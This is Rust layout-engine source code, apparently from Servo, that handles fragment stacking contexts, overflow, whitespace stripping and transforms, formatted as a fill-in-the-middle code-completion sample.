pub fn stacking_relative_content_box(&self, stacking_relative_border_box: &Rect<Au>) -> Rect<Au> { let border_padding = self.border_padding.to_physical(self.style.writing_mode); Rect::new(Point2D::new(stacking_relative_border_box.origin.x + border_padding.left, stacking_relative_border_box.origin.y + border_padding.top), Size2D::new(stacking_relative_border_box.size.width - border_padding.horizontal(), stacking_relative_border_box.size.height - border_padding.vertical())) } /// Returns true if this fragment has a filter, transform, or perspective property set. pub fn has_filter_transform_or_perspective(&self) -> bool { !self.style().get_box().transform.0.is_empty() || !self.style().get_effects().filter.0.is_empty() || self.style().get_box().perspective != Either::Second(values::None_) } /// Returns true if this fragment establishes a new stacking context and false otherwise. pub fn establishes_stacking_context(&self) -> bool { // Text fragments shouldn't create stacking contexts. match self.specific { SpecificFragmentInfo::TruncatedFragment(_) | SpecificFragmentInfo::ScannedText(_) | SpecificFragmentInfo::UnscannedText(_) => return false, _ => {} } if self.style().get_effects().opacity != 1.0 { return true } if self.style().get_effects().mix_blend_mode != mix_blend_mode::T::normal { return true } if self.has_filter_transform_or_perspective() { return true; } if self.style().get_box().transform_style == transform_style::T::preserve_3d || self.style().overrides_transform_style() { return true } // Fixed position and sticky position always create stacking contexts. if self.style().get_box().position == position::T::fixed || self.style().get_box().position == position::T::sticky { return true } // Statically positioned fragments don't establish stacking contexts if the previous // conditions are not fulfilled. Furthermore, z-index doesn't apply to statically // positioned fragments. if self.style().get_box().position == position::T::static_ { return false; } // For absolutely and relatively positioned fragments we only establish a stacking // context if there is a z-index set. // See https://www.w3.org/TR/CSS2/visuren.html#z-index self.style().get_position().z_index != Either::Second(Auto) } // Get the effective z-index of this fragment. Z-indices only apply to positioned element // per CSS 2 9.9.1 (http://www.w3.org/TR/CSS2/visuren.html#z-index), so this value may differ // from the value specified in the style. pub fn effective_z_index(&self) -> i32 { match self.style().get_box().position { position::T::static_ => {}, _ => return self.style().get_position().z_index.integer_or(0), } if !self.style().get_box().transform.0.is_empty() { return self.style().get_position().z_index.integer_or(0); } match self.style().get_box().display { display::T::flex => self.style().get_position().z_index.integer_or(0), _ => 0, } } /// Computes the overflow rect of this fragment relative to the start of the flow. pub fn compute_overflow(&self, flow_size: &Size2D<Au>, relative_containing_block_size: &LogicalSize<Au>) -> Overflow { let mut border_box = self.border_box.to_physical(self.style.writing_mode, *flow_size); // Relative position can cause us to draw outside our border box. // // FIXME(pcwalton): I'm not a fan of the way this makes us crawl though so many styles all // the time. Can't we handle relative positioning by just adjusting `border_box`? 
let relative_position = self.relative_position(relative_containing_block_size); border_box = border_box.translate_by_size(&relative_position.to_physical(self.style.writing_mode)); let mut overflow = Overflow::from_rect(&border_box); // Box shadows cause us to draw outside our border box. for box_shadow in &self.style().get_effects().box_shadow.0 { let offset = Vector2D::new(Au::from(box_shadow.base.horizontal), Au::from(box_shadow.base.vertical)); let inflation = Au::from(box_shadow.spread) + Au::from(box_shadow.base.blur) * BLUR_INFLATION_FACTOR; overflow.paint = overflow.paint.union(&border_box.translate(&offset) .inflate(inflation, inflation)) } // Outlines cause us to draw outside our border box. let outline_width = Au::from(self.style.get_outline().outline_width); if outline_width != Au(0) { overflow.paint = overflow.paint.union(&border_box.inflate(outline_width, outline_width)) } // Include the overflow of the block flow, if any. match self.specific { SpecificFragmentInfo::InlineBlock(ref info) => { let block_flow = info.flow_ref.as_block(); overflow.union(&flow::base(block_flow).overflow); } SpecificFragmentInfo::InlineAbsolute(ref info) => { let block_flow = info.flow_ref.as_block(); overflow.union(&flow::base(block_flow).overflow); } _ => (), } // FIXME(pcwalton): Sometimes excessively fancy glyphs can make us draw outside our border // box too. overflow } pub fn requires_line_break_afterward_if_wrapping_on_newlines(&self) -> bool { match self.specific { SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_some() => { let text = t.text_info.as_ref().unwrap(); text.requires_line_break_afterward_if_wrapping_on_newlines() } SpecificFragmentInfo::ScannedText(ref text) => { text.requires_line_break_afterward_if_wrapping_on_newlines() } _ => false, } } pub fn strip_leading_whitespace_if_necessary(&mut self) -> WhitespaceStrippingResult { if self.white_space().preserve_spaces() { return WhitespaceStrippingResult::RetainFragment } return match self.specific { SpecificFragmentInfo::TruncatedFragment(ref mut t) if t.text_info.is_some() => { let scanned_text_fragment_info = t.text_info.as_mut().unwrap(); scanned_text(scanned_text_fragment_info, &mut self.border_box) } SpecificFragmentInfo::ScannedText(ref mut scanned_text_fragment_info) => { scanned_text(scanned_text_fragment_info, &mut self.border_box) } SpecificFragmentInfo::UnscannedText(ref mut unscanned_text_fragment_info) => { let mut new_text_string = String::new(); let mut modified = false; for (i, character) in unscanned_text_fragment_info.text.char_indices() { if gfx::text::util::is_bidi_control(character) { new_text_string.push(character); continue } if char_is_whitespace(character) { modified = true; continue } // Finished processing leading control chars and whitespace. 
if modified { new_text_string.push_str(&unscanned_text_fragment_info.text[i..]); } break } if modified { unscanned_text_fragment_info.text = new_text_string.into_boxed_str(); } WhitespaceStrippingResult::from_unscanned_text_fragment_info( &unscanned_text_fragment_info) } _ => WhitespaceStrippingResult::RetainFragment, };<|fim▁hole|> -> WhitespaceStrippingResult { let leading_whitespace_byte_count = scanned_text_fragment_info.text() .find(|c| !char_is_whitespace(c)) .unwrap_or(scanned_text_fragment_info.text().len()); let whitespace_len = ByteIndex(leading_whitespace_byte_count as isize); let whitespace_range = Range::new(scanned_text_fragment_info.range.begin(), whitespace_len); let text_bounds = scanned_text_fragment_info.run.metrics_for_range(&whitespace_range).bounding_box; border_box.size.inline = border_box.size.inline - text_bounds.size.width; scanned_text_fragment_info.content_size.inline = scanned_text_fragment_info.content_size.inline - text_bounds.size.width; scanned_text_fragment_info.range.adjust_by(whitespace_len, -whitespace_len); WhitespaceStrippingResult::RetainFragment } } /// Returns true if the entire fragment was stripped. pub fn strip_trailing_whitespace_if_necessary(&mut self) -> WhitespaceStrippingResult { if self.white_space().preserve_spaces() { return WhitespaceStrippingResult::RetainFragment } return match self.specific { SpecificFragmentInfo::TruncatedFragment(ref mut t) if t.text_info.is_some() => { let scanned_text_fragment_info = t.text_info.as_mut().unwrap(); scanned_text(scanned_text_fragment_info, &mut self.border_box) } SpecificFragmentInfo::ScannedText(ref mut scanned_text_fragment_info) => { scanned_text(scanned_text_fragment_info, &mut self.border_box) } SpecificFragmentInfo::UnscannedText(ref mut unscanned_text_fragment_info) => { let mut trailing_bidi_control_characters_to_retain = Vec::new(); let (mut modified, mut last_character_index) = (true, 0); for (i, character) in unscanned_text_fragment_info.text.char_indices().rev() { if gfx::text::util::is_bidi_control(character) { trailing_bidi_control_characters_to_retain.push(character); continue } if char_is_whitespace(character) { modified = true; continue } last_character_index = i + character.len_utf8(); break } if modified { let mut text = unscanned_text_fragment_info.text.to_string(); text.truncate(last_character_index); for character in trailing_bidi_control_characters_to_retain.iter().rev() { text.push(*character); } unscanned_text_fragment_info.text = text.into_boxed_str(); } WhitespaceStrippingResult::from_unscanned_text_fragment_info( &unscanned_text_fragment_info) } _ => WhitespaceStrippingResult::RetainFragment, }; fn scanned_text(scanned_text_fragment_info: &mut ScannedTextFragmentInfo, border_box: &mut LogicalRect<Au>) -> WhitespaceStrippingResult { let mut trailing_whitespace_start_byte = 0; for (i, c) in scanned_text_fragment_info.text().char_indices().rev() { if !char_is_whitespace(c) { trailing_whitespace_start_byte = i + c.len_utf8(); break; } } let whitespace_start = ByteIndex(trailing_whitespace_start_byte as isize); let whitespace_len = scanned_text_fragment_info.range.length() - whitespace_start; let mut whitespace_range = Range::new(whitespace_start, whitespace_len); whitespace_range.shift_by(scanned_text_fragment_info.range.begin()); let text_bounds = scanned_text_fragment_info.run .metrics_for_range(&whitespace_range) .bounding_box; border_box.size.inline -= text_bounds.size.width; scanned_text_fragment_info.content_size.inline -= text_bounds.size.width; 
scanned_text_fragment_info.range.extend_by(-whitespace_len); WhitespaceStrippingResult::RetainFragment } } pub fn inline_styles(&self) -> InlineStyleIterator { InlineStyleIterator::new(self) } /// Returns the inline-size of this fragment's margin box. pub fn margin_box_inline_size(&self) -> Au { self.border_box.size.inline + self.margin.inline_start_end() } /// Returns true if this node *or any of the nodes within its inline fragment context* have /// non-`static` `position`. pub fn is_positioned(&self) -> bool { if self.style.get_box().position != position::T::static_ { return true } if let Some(ref inline_context) = self.inline_context { for node in inline_context.nodes.iter() { if node.style.get_box().position != position::T::static_ { return true } } } false } /// Returns true if this node is absolutely positioned. pub fn is_absolutely_positioned(&self) -> bool { self.style.get_box().position == position::T::absolute } pub fn is_inline_absolute(&self) -> bool { match self.specific { SpecificFragmentInfo::InlineAbsolute(..) => true, _ => false, } } pub fn meld_with_next_inline_fragment(&mut self, next_fragment: &Fragment) { if let Some(ref mut inline_context_of_this_fragment) = self.inline_context { if let Some(ref inline_context_of_next_fragment) = next_fragment.inline_context { for (inline_context_node_from_this_fragment, inline_context_node_from_next_fragment) in inline_context_of_this_fragment.nodes.iter_mut().rev() .zip(inline_context_of_next_fragment.nodes.iter().rev()) { if !inline_context_node_from_next_fragment.flags.contains( InlineFragmentNodeFlags::LAST_FRAGMENT_OF_ELEMENT) { continue } if inline_context_node_from_next_fragment.address != inline_context_node_from_this_fragment.address { continue } inline_context_node_from_this_fragment.flags.insert( InlineFragmentNodeFlags::LAST_FRAGMENT_OF_ELEMENT); } } } } pub fn meld_with_prev_inline_fragment(&mut self, prev_fragment: &Fragment) { if let Some(ref mut inline_context_of_this_fragment) = self.inline_context { if let Some(ref inline_context_of_prev_fragment) = prev_fragment.inline_context { for (inline_context_node_from_prev_fragment, inline_context_node_from_this_fragment) in inline_context_of_prev_fragment.nodes.iter().rev().zip( inline_context_of_this_fragment.nodes.iter_mut().rev()) { if !inline_context_node_from_prev_fragment.flags.contains( InlineFragmentNodeFlags::FIRST_FRAGMENT_OF_ELEMENT) { continue } if inline_context_node_from_prev_fragment.address != inline_context_node_from_this_fragment.address { continue } inline_context_node_from_this_fragment.flags.insert( InlineFragmentNodeFlags::FIRST_FRAGMENT_OF_ELEMENT); } } } } /// Returns true if any of the inline styles associated with this fragment have /// `vertical-align` set to `top` or `bottom`. 
pub fn is_vertically_aligned_to_top_or_bottom(&self) -> bool { match self.style.get_box().vertical_align { VerticalAlign::Top | VerticalAlign::Bottom => return true, _ => {} } if let Some(ref inline_context) = self.inline_context { for node in &inline_context.nodes { match node.style.get_box().vertical_align { VerticalAlign::Top | VerticalAlign::Bottom => return true, _ => {} } } } false } pub fn is_text_or_replaced(&self) -> bool { match self.specific { SpecificFragmentInfo::Generic | SpecificFragmentInfo::InlineAbsolute(_) | SpecificFragmentInfo::InlineAbsoluteHypothetical(_) | SpecificFragmentInfo::InlineBlock(_) | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::MulticolColumn | SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableColumn(_) | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableWrapper => false, SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::GeneratedContent(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::ScannedText(_) | SpecificFragmentInfo::TruncatedFragment(_) | SpecificFragmentInfo::Svg(_) | SpecificFragmentInfo::UnscannedText(_) => true } } /// Returns the 4D matrix representing this fragment's transform. pub fn transform_matrix(&self, stacking_relative_border_box: &Rect<Au>) -> Option<Transform3D<f32>> { let list = &self.style.get_box().transform; let transform = list.to_transform_3d_matrix(Some(stacking_relative_border_box)).ok()?.0; let transform_origin = &self.style.get_box().transform_origin; let transform_origin_x = transform_origin.horizontal .to_used_value(stacking_relative_border_box.size.width) .to_f32_px(); let transform_origin_y = transform_origin.vertical .to_used_value(stacking_relative_border_box.size.height) .to_f32_px(); let transform_origin_z = transform_origin.depth.px(); let pre_transform = Transform3D::create_translation(transform_origin_x, transform_origin_y, transform_origin_z); let post_transform = Transform3D::create_translation(-transform_origin_x, -transform_origin_y, -transform_origin_z); Some(pre_transform.pre_mul(&transform).pre_mul(&post_transform)) } /// Returns the 4D matrix representing this fragment's perspective. 
pub fn perspective_matrix(&self, stacking_relative_border_box: &Rect<Au>) -> Option<Transform3D<f32>> { match self.style().get_box().perspective { Either::First(length) => { let perspective_origin = self.style().get_box().perspective_origin; let perspective_origin = Point2D::new( perspective_origin.horizontal .to_used_value(stacking_relative_border_box.size.width) .to_f32_px(), perspective_origin.vertical .to_used_value(stacking_relative_border_box.size.height) .to_f32_px()); let pre_transform = Transform3D::create_translation(perspective_origin.x, perspective_origin.y, 0.0); let post_transform = Transform3D::create_translation(-perspective_origin.x, -perspective_origin.y, 0.0); let perspective_matrix = transform::create_perspective_matrix(length.px()); Some(pre_transform.pre_mul(&perspective_matrix).pre_mul(&post_transform)) } Either::Second(values::None_) => { None } } } } impl fmt::Debug for Fragment { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { let border_padding_string = if !self.border_padding.is_zero() { format!(" border_padding={:?}", self.border_padding) } else { "".to_owned() }; let margin_string = if !self.margin.is_zero() { format!(" margin={:?}", self.margin) } else { "".to_owned() }; let damage_string = if self.restyle_damage != RestyleDamage::empty() { format!(" damage={:?}", self.restyle_damage) } else { "".to_owned() }; write!(f, "{}({}) [{:?}] border_box={:?}{}{}{}", self.specific.get_type(), self.debug_id, self.specific, self.border_box, border_padding_string, margin_string, damage_string) } } bitflags! { struct QuantitiesIncludedInIntrinsicInlineSizes: u8 { const INTRINSIC_INLINE_SIZE_INCLUDES_MARGINS = 0x01; const INTRINSIC_INLINE_SIZE_INCLUDES_PADDING = 0x02; const INTRINSIC_INLINE_SIZE_INCLUDES_BORDER = 0x04; const INTRINSIC_INLINE_SIZE_INCLUDES_SPECIFIED = 0x08; } } bitflags! { // Various flags we can use when splitting fragments. See // `calculate_split_position_using_breaking_strategy()`. struct SplitOptions: u8 { #[doc = "True if this is the first fragment on the line."] const STARTS_LINE = 0x01; #[doc = "True if we should attempt to split at character boundaries if this split fails. \ This is used to implement `overflow-wrap: break-word`."] const RETRY_AT_CHARACTER_BOUNDARIES = 0x02; } } /// A top-down fragment border box iteration handler. pub trait FragmentBorderBoxIterator { /// The operation to perform. fn process(&mut self, fragment: &Fragment, level: i32, overflow: &Rect<Au>); /// Returns true if this fragment must be processed in-order. If this returns false, /// we skip the operation for this fragment, but continue processing siblings. fn should_process(&mut self, fragment: &Fragment) -> bool; } /// The coordinate system used in `stacking_relative_border_box()`. See the documentation of that /// method for details. #[derive(Clone, Debug, PartialEq)] pub enum CoordinateSystem { /// The border box returned is relative to the fragment's parent stacking context. Parent, /// The border box returned is relative to the fragment's own stacking context, if applicable. 
Own, } pub struct InlineStyleIterator<'a> { fragment: &'a Fragment, inline_style_index: usize, primary_style_yielded: bool, } impl<'a> Iterator for InlineStyleIterator<'a> { type Item = &'a ComputedValues; fn next(&mut self) -> Option<&'a ComputedValues> { if !self.primary_style_yielded { self.primary_style_yielded = true; return Some(&*self.fragment.style) } let inline_context = self.fragment.inline_context.as_ref()?; let inline_style_index = self.inline_style_index; if inline_style_index == inline_context.nodes.len() { return None } self.inline_style_index += 1; Some(&*inline_context.nodes[inline_style_index].style) } } impl<'a> InlineStyleIterator<'a> { fn new(fragment: &Fragment) -> InlineStyleIterator { InlineStyleIterator { fragment: fragment, inline_style_index: 0, primary_style_yielded: false, } } } #[derive(Clone, Copy, Debug, PartialEq)] pub enum WhitespaceStrippingResult { RetainFragment, FragmentContainedOnlyBidiControlCharacters, FragmentContainedOnlyWhitespace, } impl WhitespaceStrippingResult { fn from_unscanned_text_fragment_info(info: &UnscannedTextFragmentInfo) -> WhitespaceStrippingResult { if info.text.is_empty() { WhitespaceStrippingResult::FragmentContainedOnlyWhitespace } else if info.text.chars().all(gfx::text::util::is_bidi_control) { WhitespaceStrippingResult::FragmentContainedOnlyBidiControlCharacters } else { WhitespaceStrippingResult::RetainFragment } } } /// The overflow area. We need two different notions of overflow: paint overflow and scrollable /// overflow. #[derive(Clone, Copy, Debug)] pub struct Overflow { pub scroll: Rect<Au>, pub paint: Rect<Au>, } impl Overflow { pub fn new() -> Overflow { Overflow { scroll: Rect::zero(), paint: Rect::zero(), } } pub fn from_rect(border_box: &Rect<Au>) -> Overflow { Overflow { scroll: *border_box, paint: *border_box, } } pub fn union(&mut self, other: &Overflow) { self.scroll = self.scroll.union(&other.scroll); self.paint = self.paint.union(&other.paint); } pub fn translate(&mut self, by: &Vector2D<Au>) { self.scroll = self.scroll.translate(by); self.paint = self.paint.translate(by); } } bitflags! { pub struct FragmentFlags: u8 { // TODO(stshine): find a better name since these flags can also be used for grid item. /// Whether this fragment represents a child in a row flex container. const IS_INLINE_FLEX_ITEM = 0b0000_0001; /// Whether this fragment represents a child in a column flex container. const IS_BLOCK_FLEX_ITEM = 0b0000_0010; /// Whether this fragment represents the generated text from a text-overflow clip. const IS_ELLIPSIS = 0b0000_0100; } } /// Specified distances from the margin edge of a block to its content in the inline direction. /// These are returned by `guess_inline_content_edge_offsets()` and are used in the float placement /// speculation logic. 
#[derive(Clone, Copy, Debug)] pub struct SpeculatedInlineContentEdgeOffsets { pub start: Au, pub end: Au, } #[cfg(not(debug_assertions))] #[derive(Clone)] struct DebugId; #[cfg(debug_assertions)] #[derive(Clone)] struct DebugId(u16); #[cfg(not(debug_assertions))] impl DebugId { pub fn new() -> DebugId { DebugId } } #[cfg(debug_assertions)] impl DebugId { pub fn new() -> DebugId { DebugId(layout_debug::generate_unique_debug_id()) } } #[cfg(not(debug_assertions))] impl fmt::Display for DebugId { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{:p}", &self) } } #[cfg(debug_assertions)] impl fmt::Display for DebugId { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.0) } } #[cfg(not(debug_assertions))] impl Serialize for DebugId { fn serialize<S: Serializer>(&self, serializer: S) -> Result<S::Ok, S::Error> { serializer.serialize_str(&format!("{:p}", &self)) } } #[cfg(debug_assertions)] impl Serialize for DebugId { fn serialize<S: Serializer>(&self, serializer: S) -> Result<S::Ok, S::Error> { serializer.serialize_u16(self.0) } }<|fim▁end|>
fn scanned_text(scanned_text_fragment_info: &mut ScannedTextFragmentInfo, border_box: &mut LogicalRect<Au>)
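// Illustrative sketch (editor's addition, not part of the record above): the
// byte-index arithmetic that `scanned_text` relies on, shown on a plain &str.
// The helper names here are hypothetical; only std `find`, `char_indices`,
// and `len_utf8` are assumed.
fn leading_whitespace_bytes(text: &str) -> usize {
    // Byte offset of the first non-whitespace char; if the text is all
    // whitespace, the entire length is stripped.
    text.find(|c: char| !c.is_whitespace()).unwrap_or(text.len())
}

fn retained_text_end(text: &str) -> usize {
    // Walk chars in reverse; the first non-whitespace char ends the retained
    // text at `i + c.len_utf8()` (0 if the text is all whitespace).
    for (i, c) in text.char_indices().rev() {
        if !c.is_whitespace() {
            return i + c.len_utf8();
        }
    }
    0
}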
<|file_name|>getcoins.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3 # Copyright (c) 2020-2021 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. import argparse import io import requests import subprocess import sys DEFAULT_GLOBAL_FAUCET = 'https://signetfaucet.com/claim' DEFAULT_GLOBAL_CAPTCHA = 'https://signetfaucet.com/captcha' GLOBAL_FIRST_BLOCK_HASH = '00000086d6b2636cb2a392d45edc4ec544a10024d30141c9adf4bfd9de533b53' # braille unicode block BASE = 0x2800 BIT_PER_PIXEL = [ [0x01, 0x08], [0x02, 0x10], [0x04, 0x20], [0x40, 0x80], ] BW = 2 BH = 4 # imagemagick or compatible fork (used for converting SVG) CONVERT = 'convert' class PPMImage: ''' Load a PPM image (Pillow-ish API). ''' def __init__(self, f): if f.readline() != b'P6\n': raise ValueError('Invalid ppm format: header') line = f.readline() (width, height) = (int(x) for x in line.rstrip().split(b' ')) if f.readline() != b'255\n': raise ValueError('Invalid ppm format: color depth') data = f.read(width * height * 3) stride = width * 3 self.size = (width, height) self._grid = [[tuple(data[stride * y + 3 * x:stride * y + 3 * (x + 1)]) for x in range(width)] for y in range(height)] def getpixel(self, pos): return self._grid[pos[1]][pos[0]] def print_image(img, threshold=128): '''Print black-and-white image to terminal in braille unicode characters.''' x_blocks = (img.size[0] + BW - 1) // BW y_blocks = (img.size[1] + BH - 1) // BH for yb in range(y_blocks): line = [] for xb in range(x_blocks): ch = BASE for y in range(BH): for x in range(BW): try: val = img.getpixel((xb * BW + x, yb * BH + y)) except IndexError: pass else: if val[0] < threshold: ch |= BIT_PER_PIXEL[y][x] line.append(chr(ch)) print(''.join(line)) <|fim▁hole|>parser = argparse.ArgumentParser(description='Script to get coins from a faucet.', epilog='You may need to start with double-dash (--) when providing bitcoin-cli arguments.') parser.add_argument('-c', '--cmd', dest='cmd', default='bitcoin-cli', help='bitcoin-cli command to use') parser.add_argument('-f', '--faucet', dest='faucet', default=DEFAULT_GLOBAL_FAUCET, help='URL of the faucet') parser.add_argument('-g', '--captcha', dest='captcha', default=DEFAULT_GLOBAL_CAPTCHA, help='URL of the faucet captcha, or empty if no captcha is needed') parser.add_argument('-a', '--addr', dest='addr', default='', help='Bitcoin address to which the faucet should send') parser.add_argument('-p', '--password', dest='password', default='', help='Faucet password, if any') parser.add_argument('-n', '--amount', dest='amount', default='0.001', help='Amount to request (0.001-0.1, default is 0.001)') parser.add_argument('-i', '--imagemagick', dest='imagemagick', default=CONVERT, help='Path to imagemagick convert utility') parser.add_argument('bitcoin_cli_args', nargs='*', help='Arguments to pass on to bitcoin-cli (default: -signet)') args = parser.parse_args() if args.bitcoin_cli_args == []: args.bitcoin_cli_args = ['-signet'] def bitcoin_cli(rpc_command_and_params): argv = [args.cmd] + args.bitcoin_cli_args + rpc_command_and_params try: return subprocess.check_output(argv).strip().decode() except FileNotFoundError: print('The binary', args.cmd, 'could not be found.') exit(1) except subprocess.CalledProcessError: cmdline = ' '.join(argv) print(f'-----\nError while calling "{cmdline}" (see output above).') exit(1) if args.faucet.lower() == DEFAULT_GLOBAL_FAUCET: # Get the hash of the block at height 1 of the currently 
    # active signet chain
    curr_signet_hash = bitcoin_cli(['getblockhash', '1'])
    if curr_signet_hash != GLOBAL_FIRST_BLOCK_HASH:
        print('The global faucet cannot be used with a custom Signet network. Please use the global signet or set up your custom faucet to use this functionality.\n')
        exit(1)
else:
    # For custom faucets, don't request captcha by default.
    if args.captcha == DEFAULT_GLOBAL_CAPTCHA:
        args.captcha = ''

if args.addr == '':
    # get address for receiving coins
    args.addr = bitcoin_cli(['getnewaddress', 'faucet', 'bech32'])

data = {'address': args.addr, 'password': args.password, 'amount': args.amount}

# Store cookies
# for debugging: print(session.cookies.get_dict())
session = requests.Session()

if args.captcha != '':
    # Retrieve a captcha
    try:
        res = session.get(args.captcha)
    except:
        print('Unexpected error when contacting faucet:', sys.exc_info()[0])
        exit(1)

    # Convert SVG image to PPM, and load it
    try:
        rv = subprocess.run([args.imagemagick, '-', '-depth', '8', 'ppm:-'], input=res.content, check=True, capture_output=True)
    except FileNotFoundError:
        print('The binary', args.imagemagick, 'could not be found. Please make sure ImageMagick (or a compatible fork) is installed and that the correct path is specified.')
        exit(1)

    img = PPMImage(io.BytesIO(rv.stdout))

    # Terminal interaction
    print_image(img)
    print('Enter captcha: ', end='')
    data['captcha'] = input()

try:
    res = session.post(args.faucet, data=data)
except:
    print('Unexpected error when contacting faucet:', sys.exc_info()[0])
    exit(1)

# Display the output as per the returned status code
if res:
    # When the return code is in between 200 and 400 i.e. successful
    print(res.text)
elif res.status_code == 404:
    print('The specified faucet URL does not exist. Please check for any server issues/typo.')
elif res.status_code == 429:
    print('The script does not allow for repeated transactions as the global faucet is rate-limited to 1 request/IP/day. You can access the faucet website to get more coins manually.')
else:
    print(f'Returned Error Code {res.status_code}\n{res.text}\n')
    print('Please check the provided arguments for their validity and/or any possible typo.')<|fim▁end|>
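# Illustrative sketch (editor's addition, not part of the record above): how
# print_image() packs one 2x4 pixel cell into a single braille codepoint,
# using the same BASE/BIT_PER_PIXEL constants defined in getcoins.py.
def braille_char(cell):
    # cell is 4 rows x 2 columns of booleans, True meaning a dark pixel.
    bits = [[0x01, 0x08], [0x02, 0x10], [0x04, 0x20], [0x40, 0x80]]
    ch = 0x2800  # BASE: the empty braille pattern
    for y in range(4):
        for x in range(2):
            if cell[y][x]:
                ch |= bits[y][x]
    return chr(ch)

# braille_char([[True, False]] + [[False, False]] * 3) == '\u2801' (dot 1 only)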
<|file_name|>context.go<|end_file_name|><|fim▁begin|>// Copyright (c) 2016 Uber Technologies, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. package tchannelthrift import ( stdctx "context" "time" "github.com/m3db/m3/src/x/context" apachethrift "github.com/apache/thrift/lib/go/thrift" "github.com/uber/tchannel-go" "github.com/uber/tchannel-go/thrift" ) const ( contextKey = "m3dbcontext" ) // RegisterServer will register a tchannel thrift server and create and close M3DB contexts per request func RegisterServer(channel *tchannel.Channel, service thrift.TChanServer, contextPool context.Pool) { server := thrift.NewServer(channel) server.Register(service, thrift.OptPostResponse(postResponseFn)) server.SetContextFn(func(ctx stdctx.Context, method string, headers map[string]string) thrift.Context { xCtx := contextPool.Get() xCtx.SetGoContext(ctx) ctxWithValue := stdctx.WithValue(ctx, contextKey, xCtx) //nolint: staticcheck return thrift.WithHeaders(ctxWithValue, headers) }) } // NewContext returns a new thrift context and cancel func with embedded M3DB context func NewContext(timeout time.Duration) (thrift.Context, stdctx.CancelFunc) { tctx, cancel := thrift.NewContext(timeout) xCtx := context.NewWithGoContext(tctx) ctxWithValue := stdctx.WithValue(tctx, contextKey, xCtx) //nolint: staticcheck return thrift.WithHeaders(ctxWithValue, nil), cancel } // Context returns an M3DB context from the thrift context<|fim▁hole|>func Context(ctx thrift.Context) context.Context { return ctx.Value(contextKey).(context.Context) } func postResponseFn(ctx stdctx.Context, method string, response apachethrift.TStruct) { value := ctx.Value(contextKey) inner := value.(context.Context) inner.Close() }<|fim▁end|>
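// Illustrative sketch (editor's addition, not part of the record above): the
// expected call pattern for the helpers in context.go -- only NewContext,
// Context, and the M3DB context's Close are assumed, all visible above.
//
//	tctx, cancel := tchannelthrift.NewContext(time.Minute)
//	defer cancel()
//	xCtx := tchannelthrift.Context(tctx) // recover the embedded M3DB context
//	defer xCtx.Close()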
<|file_name|>inherited_text.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ use parsing::parse; use style::values::generics::text::Spacing; #[test] fn negative_letter_spacing_should_parse_properly() { use style::properties::longhands::letter_spacing; use style::values::specified::length::{FontRelativeLength, Length, NoCalcLength}; let negative_value = parse_longhand!(letter_spacing, "-0.5em"); let expected = Spacing::Value(Length::NoCalc(NoCalcLength::FontRelative( FontRelativeLength::Em(-0.5), ))); assert_eq!(negative_value, expected); } #[test] fn negative_word_spacing_should_parse_properly() { use style::properties::longhands::word_spacing; use style::values::specified::length::{FontRelativeLength, LengthOrPercentage, NoCalcLength}; let negative_value = parse_longhand!(word_spacing, "-0.5em"); let expected = Spacing::Value(LengthOrPercentage::Length(NoCalcLength::FontRelative( FontRelativeLength::Em(-0.5), ))); assert_eq!(negative_value, expected); } #[test] fn line_height_should_return_number_on_plain_zero() { use style::properties::longhands::line_height; let result = parse(line_height::parse, "0").unwrap(); assert_eq!(result, parse_longhand!(line_height, "0")); } #[test] fn line_height_should_return_length_on_length_zero() { use style::properties::longhands::line_height; let result = parse(line_height::parse, "0px").unwrap();<|fim▁hole|>}<|fim▁end|>
assert_eq!(result, parse_longhand!(line_height, "0px"));
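// Editor's note (not part of the record above): the two zero tests encode a
// real CSS distinction -- `line-height: 0` is a <number> (a multiplier on the
// font size), while `line-height: 0px` is a <length>; the parser must not
// collapse one into the other, which is exactly what the asserts check.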
